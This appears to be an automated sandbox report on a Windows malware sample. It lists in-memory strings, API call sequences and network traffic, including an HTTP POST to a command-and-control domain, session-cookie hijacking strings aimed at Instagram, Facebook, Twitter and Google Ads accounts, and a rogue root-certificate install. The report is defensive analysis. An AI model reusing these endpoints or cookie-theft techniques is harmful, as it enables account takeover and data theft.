Source: 1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	String found in binary or memory: https://www.facebook.com/payments/settings/payment_methods/index.php?__a=1 equals www.facebook.com (Facebook)
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	String found in binary or memory: https://www.facebook.com/x/oauth/status?client_id=124024574287414&input_token&origin=1&redirect_uri= equals www.facebook.com (Facebook)
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	String found in binary or memory: https://www.facebook.com/x/oauth/status?client_id=124024574287414&input_token&origin=1&redirect_uri=origin: https://www.instagram.comsec-fetch-mode: corsreferer: https://www.instagram.com/sec-fetch-site: cross-sitefb-ar: equals www.facebook.com (Facebook)
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	String found in binary or memory: https://www.instagram.com/accounts/login/ajax/facebook/ equals www.facebook.com (Facebook)
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	String found in binary or memory: x-csrftoken: xhttps://www.instagram.com/accounts/login/ajax/facebook/"userId": "sessionid="";sessionid=;query_instagram_cookie.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: sessionid = %s equals www.facebook.com (Facebook)
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	String found in binary or memory: x-csrftoken: xhttps://www.instagram.com/accounts/login/ajax/facebook/"userId": "sessionid="";sessionid=;query_instagram_cookie_20191224.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: sessionid = %s equals www.facebook.com (Facebook)
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	String found in binary or memory: x-csrftoken: xhttps://www.instagram.com/accounts/login/ajax/facebook/"userId": "sessionid="";sessionid=;query_instagram_cookie_20200229.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: sessionid = %s equals www.facebook.com (Facebook)

Source: unknown

DNS traffic detected: queries for: ef6df4af06ba6896.xyz

Source: unknown

HTTP traffic detected: POST /info/w HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36upgrade-insecure-requests: 1Content-Length: 93Host: ef6df4af06ba6896.xyz

Source: 1E1C360C582DF797.exe, 0000000F.00000002.1009199504.000000000278C000.00000004.00000020.sdmp	String found in binary or memory: http://EF6DF4AF06BA6896.xyz/
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1009199504.000000000278C000.00000004.00000020.sdmp	String found in binary or memory: http://EF6DF4AF06BA6896.xyz/Ahy
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1009199504.000000000278C000.00000004.00000020.sdmp	String found in binary or memory: http://EF6DF4AF06BA6896.xyz/F
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1009199504.000000000278C000.00000004.00000020.sdmp	String found in binary or memory: http://EF6DF4AF06BA6896.xyz/NFh8
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1009537921.0000000004287000.00000004.00000040.sdmp	String found in binary or memory: http://EF6DF4AF06BA6896.xyz/f
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1009199504.000000000278C000.00000004.00000020.sdmp	String found in binary or memory: http://EF6DF4AF06BA6896.xyz/hy
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1009113059.000000000277A000.00000004.00000020.sdmp, 1E1C360C582DF797.exe, 0000000F.00000002.1009139131.0000000002781000.00000004.00000020.sdmp	String found in binary or memory: http://EF6DF4AF06BA6896.xyz/info/g
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1009139131.0000000002781000.00000004.00000020.sdmp	String found in binary or memory: http://EF6DF4AF06BA6896.xyz/info/w
Source: 1E1C360C582DF797.exe, 0000000F.00000003.1003241141.00000000027C0000.00000004.00000001.sdmp	String found in binary or memory: http://EF6DF4AF06BA6896.xyz:80/info/eCPI
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1009251772.0000000002796000.00000004.00000020.sdmp	String found in binary or memory: http://EF6DF4AF06BA6896.xyz:80/info/g
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1009251772.0000000002796000.00000004.00000020.sdmp	String found in binary or memory: http://EF6DF4AF06BA6896.xyz:80/info/wBCj
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1009559041.000000000428C000.00000004.00000040.sdmp	String found in binary or memory: http://appldnld.apple.com/QuickTime/041-3089.20111026.Sxpr4/QuickTimeInstaller.exe
Source: aliens.exe.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCA-1.crt0
Source: aliens.exe.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceCodeSigningCA-1.crt0
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
Source: aliens.exe.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: aliens.exe.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2HighAssuranceCodeSigningCA.crt0
Source: h1GodtbhC8.exe, 00000000.00000002.794457688.0000000000420000.00000004.00020000.sdmp, Sibuia.dll.0.dr	String found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
Source: h1GodtbhC8.exe, 00000000.00000002.794457688.0000000000420000.00000004.00020000.sdmp, Sibuia.dll.0.dr	String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: aliens.exe.1.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDCA-1.crl08
Source: aliens.exe.1.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: aliens.exe.1.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: aliens.exe.1.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0O
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	String found in binary or memory: http://crl3.digicert.com/ha-cs-2011a.crl0.
Source: aliens.exe.1.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: aliens.exe.1.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	String found in binary or memory: http://crl3.digicert.com/sha2-ha-cs-g1.crl00
Source: aliens.exe.1.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDCA-1.crl0w
Source: aliens.exe.1.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: aliens.exe.1.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	String found in binary or memory: http://crl4.digicert.com/ha-cs-2011a.crl0L
Source: aliens.exe.1.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
Source: aliens.exe.1.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	String found in binary or memory: http://crl4.digicert.com/sha2-ha-cs-g1.crl0L
Source: h1GodtbhC8.exe, 00000000.00000002.794457688.0000000000420000.00000004.00020000.sdmp, Sibuia.dll.0.dr	String found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
Source: h1GodtbhC8.exe, 00000000.00000002.794457688.0000000000420000.00000004.00020000.sdmp, Sibuia.dll.0.dr	String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1009199504.000000000278C000.00000004.00000020.sdmp	String found in binary or memory: http://ef6df4af06ba6896.xyz/
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1009023272.0000000002748000.00000004.00000020.sdmp	String found in binary or memory: http://ef6df4af06ba6896.xyz/:
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1009023272.0000000002748000.00000004.00000020.sdmp	String found in binary or memory: http://ef6df4af06ba6896.xyz/info/g
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1009023272.0000000002748000.00000004.00000020.sdmp	String found in binary or memory: http://ef6df4af06ba6896.xyz/info/gz
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1009139131.0000000002781000.00000004.00000020.sdmp	String found in binary or memory: http://ef6df4af06ba6896.xyz/info/w
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1009199504.000000000278C000.00000004.00000020.sdmp	String found in binary or memory: http://ef6df4af06ba6896.xyz/nf
Source: aliens.exe, aliens.exe, 00000006.00000002.1007540272.0000000000409000.00000002.00020000.sdmp, 1E1C360C582DF797.exe, 0000000F.00000002.1007578546.0000000000409000.00000002.00020000.sdmp, 1E1C360C582DF797.exe, 00000012.00000000.1051421766.0000000000409000.00000002.00020000.sdmp, aliens.exe.1.dr	String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: aliens.exe, 00000006.00000002.1007540272.0000000000409000.00000002.00020000.sdmp, 1E1C360C582DF797.exe, 0000000F.00000002.1007578546.0000000000409000.00000002.00020000.sdmp, 1E1C360C582DF797.exe, 00000012.00000000.1051421766.0000000000409000.00000002.00020000.sdmp, aliens.exe.1.dr	String found in binary or memory: http://nsis.sf.net/NSIS_Error...
Source: h1GodtbhC8.exe	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: aliens.exe.1.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: aliens.exe.1.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.digicert.com0I
Source: aliens.exe.1.dr	String found in binary or memory: http://ocsp.digicert.com0N
Source: aliens.exe.1.dr	String found in binary or memory: http://ocsp.digicert.com0O
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.digicert.com0P
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.digicert.com0R
Source: h1GodtbhC8.exe, 00000000.00000002.794457688.0000000000420000.00000004.00020000.sdmp, Sibuia.dll.0.dr	String found in binary or memory: http://ocsp.sectigo.com0
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp, aliens.exe.1.dr	String found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1014478867.0000000005270000.00000004.00000001.sdmp	String found in binary or memory: http://www.interestvideo.com/video1.php
Source: 1607153318099.exe, 00000013.00000002.995045101.0000000000198000.00000004.00000010.sdmp	String found in binary or memory: http://www.nirsoft.net
Source: 1607153318099.exe	String found in binary or memory: http://www.nirsoft.net/
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	String found in binary or memory: https://01%s08%s15%s22%sWebGL%d%02d%s.club/http://01%s08%s15%s22%sFrankLin%d%02d%s.xyz/post_info.
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	String found in binary or memory: https://ads.google.com/nav/_/rpc/GaiaInfoService/Get?authuser=0&rpcTrackingId=GaiaInfoService.Get%3A
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	String found in binary or memory: https://ads.google.com/nav/_/rpc/UserByGaiaService/Get?authuser=0&rpcTrackingId=UserByGaiaService.Ge
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	String found in binary or memory: https://ads.google.com/nav/_/rpc/UserCustomerAccessService/List?authuser=0&rpcTrackingId=UserCustome
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	String found in binary or memory: https://ads.google.com/nav/selectaccount
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	String found in binary or memory: https://ads.google.com/nav/selectaccountocation:
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	String found in binary or memory: https://ads.google.comsec-fetch-dest:
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	String found in binary or memory: https://api.twitter.com/1.1/statuses/update.json
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	String found in binary or memory: https://api.twitter.com/1.1/statuses/update.jsoninclude_profile_interstitial_type=1&include_blocking
Source: h1GodtbhC8.exe, 00000000.00000002.804854964.000000006D905000.00000002.00020000.sdmp, Sibuia.dll.0.dr	String found in binary or memory: https://apreltech.com/SilentInstallBuilder/Doc/&t=event&ec=%s&ea=%s&el=_
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1014478867.0000000005270000.00000004.00000001.sdmp	String found in binary or memory: https://curl.haxx.se/docs/http-cookies.html
Source: h1GodtbhC8.exe	String found in binary or memory: https://sectigo.com/CPS0
Source: h1GodtbhC8.exe, 00000000.00000002.794457688.0000000000420000.00000004.00020000.sdmp, Sibuia.dll.0.dr	String found in binary or memory: https://sectigo.com/CPS0D
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	String found in binary or memory: https://twitter.com/
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	String found in binary or memory: https://twitter.com/compose/tweetsec-fetch-dest:
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	String found in binary or memory: https://twitter.com/compose/tweetsec-fetch-mode:
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	String found in binary or memory: https://twitter.com/ookie:
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	String found in binary or memory: https://twitter.comReferer:
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	String found in binary or memory: https://twitter.comsec-fetch-dest:
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	String found in binary or memory: https://upload.twitter.com/i/media/upload.json
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	String found in binary or memory: https://upload.twitter.com/i/media/upload.json%dcommand=INIT&total_bytes=&media_type=image%2Fjpeg&me
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	String found in binary or memory: https://upload.twitter.com/i/media/upload.json?command=APPEND&media_id=%s&segment_index=0
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	String found in binary or memory: https://upload.twitter.com/i/media/upload.json?command=APPEND&media_id=%s&segment_index=0accept:
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	String found in binary or memory: https://upload.twitter.com/i/media/upload.jsoncommand=FINALIZE&media_id=
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp, aliens.exe.1.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	String found in binary or memory: https://www.instagram.com/
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	String found in binary or memory: https://www.instagram.com/accept:
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	String found in binary or memory: https://www.instagram.com/accounts/login/ajax/facebook/
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	String found in binary or memory: https://www.instagram.com/graphql/query/?query_hash=149bef52a3b2af88c0fec37913fe1cbc&variables=%7B%2
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	String found in binary or memory: https://www.instagram.com/sec-fetch-site:
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	String found in binary or memory: https://www.instagram.comsec-fetch-mode:
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	String found in binary or memory: https://www.messenger.com
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	String found in binary or memory: https://www.messenger.com/
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	String found in binary or memory: https://www.messenger.com/accept:
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	String found in binary or memory: https://www.messenger.com/login/nonce/
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	String found in binary or memory: https://www.messenger.com/origin:
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	String found in binary or memory: https://www.messenger.comhttps://www.messenger.com/login/nonce/ookie:

Source: C:\Users\user\Desktop\h1GodtbhC8.exe

Code function: 0_2_004050F9 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

Source: C:\Users\user\Desktop\h1GodtbhC8.exe

Code function: 0_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

Source: h1GodtbhC8.exe, 00000000.00000002.794689519.00000000008AA000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Registers a new ROOT certificate

Show sources

Source: C:\Program Files (x86)\71eza90awf48\aliens.exe

Code function: 6_2_1001F720 CryptStringToBinaryA,CryptStringToBinaryA,CertCreateCertificateContext,CertOpenStore,CertAddCertificateContextToStore,GetLastError,CertGetCertificateContextProperty,_memset,CertGetCertificateContextProperty,_memset,_memset,_sprintf,_sprintf,CertCloseStore,CertFreeCertificateContext,

Source: C:\Users\user\Desktop\h1GodtbhC8.exe

Code function: 0_2_6D8A4C20 _DebugHeapAllocator,_DebugHeapAllocator,Concurrency::details::ContextBase::GetWorkQueueIdentity,std::ios_base::good,ExpandEnvironmentStringsW,_DebugHeapAllocator,Concurrency::details::ContextBase::GetWorkQueueIdentity,Concurrency::details::ContextBase::GetWorkQueueIdentity,GetCurrentThreadId,GetThreadDesktop,CreateDesktopW,GetLastError,SetThreadDesktop,GetLastError,CloseDesktop,CreateProcessW,GetLastError,CloseDesktop,FindCloseChangeNotification,CreateJobObjectW,AssignProcessToJobObject,_DebugHeapAllocator,Sleep,Sleep,_DebugHeapAllocator,SetThreadDesktop,CloseDesktop,TerminateProcess,WaitForSingleObject,GetExitCodeProcess,CloseHandle,CloseHandle,

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 15.2.1E1C360C582DF797.exe.5720000.7.unpack, type: UNPACKEDPE	Matched rule: APT34_PICKPOCKET Author: unknown
Source: 15.2.1E1C360C582DF797.exe.5270000.6.unpack, type: UNPACKEDPE	Matched rule: APT34_PICKPOCKET Author: unknown

PE file has a writeable .text section

Show sources

Source: aliens.exe.1.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: 1E1C360C582DF797.exe.6.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Program Files (x86)\71eza90awf48\aliens.exe	Code function: 6_2_10019D40 LoadLibraryA,GetProcAddress,GetCurrentThread,NtSetInformationThread,
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe	Code function: 6_2_10019F00 LoadLibraryA,GetProcAddress,GetCurrentProcess,NtQueryInformationProcess,
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe	Code function: 6_2_10019F50 LoadLibraryA,GetProcAddress,GetCurrentProcess,NtQueryInformationProcess,
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe	Code function: 6_2_10019FA0 LoadLibraryA,GetProcAddress,GetCurrentProcess,NtQueryInformationProcess,
Source: C:\Users\user\AppData\Roaming\1607153318099.exe	Code function: 19_2_0040C516 NtQuerySystemInformation,
Source: C:\Users\user\AppData\Roaming\1607153318099.exe	Code function: 19_2_0040C6FB memset,CreateFileW,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,FreeLibrary,

Source: C:\Users\user\AppData\Local\Temp\sib26E3.tmp\0\setup.exe

Code function: 1_2_008A7165: __EH_prolog,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,

Source: C:\Users\user\Desktop\h1GodtbhC8.exe

Code function: 0_2_004038AF EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,

Source: C:\Users\user\Desktop\h1GodtbhC8.exe	Code function: 0_2_004079A2
Source: C:\Users\user\Desktop\h1GodtbhC8.exe	Code function: 0_2_004049A8
Source: C:\Users\user\Desktop\h1GodtbhC8.exe	Code function: 0_2_00406EFE
Source: C:\Users\user\Desktop\h1GodtbhC8.exe	Code function: 0_2_0040737E
Source: C:\Users\user\Desktop\h1GodtbhC8.exe	Code function: 0_2_6D8FFC01
Source: C:\Users\user\Desktop\h1GodtbhC8.exe	Code function: 0_2_6D8FBC5D
Source: C:\Users\user\Desktop\h1GodtbhC8.exe	Code function: 0_2_6D8F9FF6
Source: C:\Users\user\Desktop\h1GodtbhC8.exe	Code function: 0_2_6D8EAE3E
Source: C:\Users\user\Desktop\h1GodtbhC8.exe	Code function: 0_2_6D8ECE40
Source: C:\Users\user\Desktop\h1GodtbhC8.exe	Code function: 0_2_6D8FBB3D
Source: C:\Users\user\Desktop\h1GodtbhC8.exe	Code function: 0_2_6D8E756E
Source: C:\Users\user\Desktop\h1GodtbhC8.exe	Code function: 0_2_6D8E77A0
Source: C:\Users\user\Desktop\h1GodtbhC8.exe	Code function: 0_2_6D8D7714
Source: C:\Users\user\Desktop\h1GodtbhC8.exe	Code function: 0_2_6D8E733C
Source: C:\Users\user\AppData\Local\Temp\sib26E3.tmp\0\setup.exe	Code function: 1_2_008B65B6
Source: C:\Users\user\AppData\Local\Temp\sib26E3.tmp\0\setup.exe	Code function: 1_2_008A8525
Source: C:\Users\user\AppData\Local\Temp\sib26E3.tmp\0\setup.exe	Code function: 1_2_008B702F
Source: C:\Users\user\AppData\Local\Temp\sib26E3.tmp\0\setup.exe	Code function: 1_2_008A404E
Source: C:\Users\user\AppData\Local\Temp\sib26E3.tmp\0\setup.exe	Code function: 1_2_008AE1E0
Source: C:\Users\user\AppData\Local\Temp\sib26E3.tmp\0\setup.exe	Code function: 1_2_008C0146
Source: C:\Users\user\AppData\Local\Temp\sib26E3.tmp\0\setup.exe	Code function: 1_2_008A326D
Source: C:\Users\user\AppData\Local\Temp\sib26E3.tmp\0\setup.exe	Code function: 1_2_008C055E
Source: C:\Users\user\AppData\Local\Temp\sib26E3.tmp\0\setup.exe	Code function: 1_2_008C457A
Source: C:\Users\user\AppData\Local\Temp\sib26E3.tmp\0\setup.exe	Code function: 1_2_008C47A9
Source: C:\Users\user\AppData\Local\Temp\sib26E3.tmp\0\setup.exe	Code function: 1_2_008A27D4
Source: C:\Users\user\AppData\Local\Temp\sib26E3.tmp\0\setup.exe	Code function: 1_2_008AE7E0
Source: C:\Users\user\AppData\Local\Temp\sib26E3.tmp\0\setup.exe	Code function: 1_2_008B3731
Source: C:\Users\user\AppData\Local\Temp\sib26E3.tmp\0\setup.exe	Code function: 1_2_008AF8A8
Source: C:\Users\user\AppData\Local\Temp\sib26E3.tmp\0\setup.exe	Code function: 1_2_008C0993
Source: C:\Users\user\AppData\Local\Temp\sib26E3.tmp\0\setup.exe	Code function: 1_2_008B39AC
Source: C:\Users\user\AppData\Local\Temp\sib26E3.tmp\0\setup.exe	Code function: 1_2_008B69EB
Source: C:\Users\user\AppData\Local\Temp\sib26E3.tmp\0\setup.exe	Code function: 1_2_008CCA20
Source: C:\Users\user\AppData\Local\Temp\sib26E3.tmp\0\setup.exe	Code function: 1_2_008B5BE7
Source: C:\Users\user\AppData\Local\Temp\sib26E3.tmp\0\setup.exe	Code function: 1_2_008B3CDD
Source: C:\Users\user\AppData\Local\Temp\sib26E3.tmp\0\setup.exe	Code function: 1_2_008BFC4A
Source: C:\Users\user\AppData\Local\Temp\sib26E3.tmp\0\setup.exe	Code function: 1_2_008AEC54
Source: C:\Users\user\AppData\Local\Temp\sib26E3.tmp\0\setup.exe	Code function: 1_2_008ADDAC
Source: C:\Users\user\AppData\Local\Temp\sib26E3.tmp\0\setup.exe	Code function: 1_2_008C0DC8
Source: C:\Users\user\AppData\Local\Temp\sib26E3.tmp\0\setup.exe	Code function: 1_2_008ABD53
Source: C:\Users\user\AppData\Local\Temp\sib26E3.tmp\0\setup.exe	Code function: 1_2_008CCECE
Source: C:\Users\user\AppData\Local\Temp\sib26E3.tmp\0\setup.exe	Code function: 1_2_008D0FD4
Source: C:\Users\user\AppData\Local\Temp\sib26E3.tmp\0\setup.exe	Code function: 1_2_008A5F0C
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe	Code function: 6_2_00403DA8
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe	Code function: 6_2_00407071
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe	Code function: 6_2_1000C063
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe	Code function: 6_2_1000B883
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe	Code function: 6_2_100060F0
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe	Code function: 6_2_100169BD
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe	Code function: 6_2_100099E0
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe	Code function: 6_2_100071F0
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe	Code function: 6_2_10009257
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe	Code function: 6_2_10010AED
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe	Code function: 6_2_10008340
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe	Code function: 6_2_1000E380
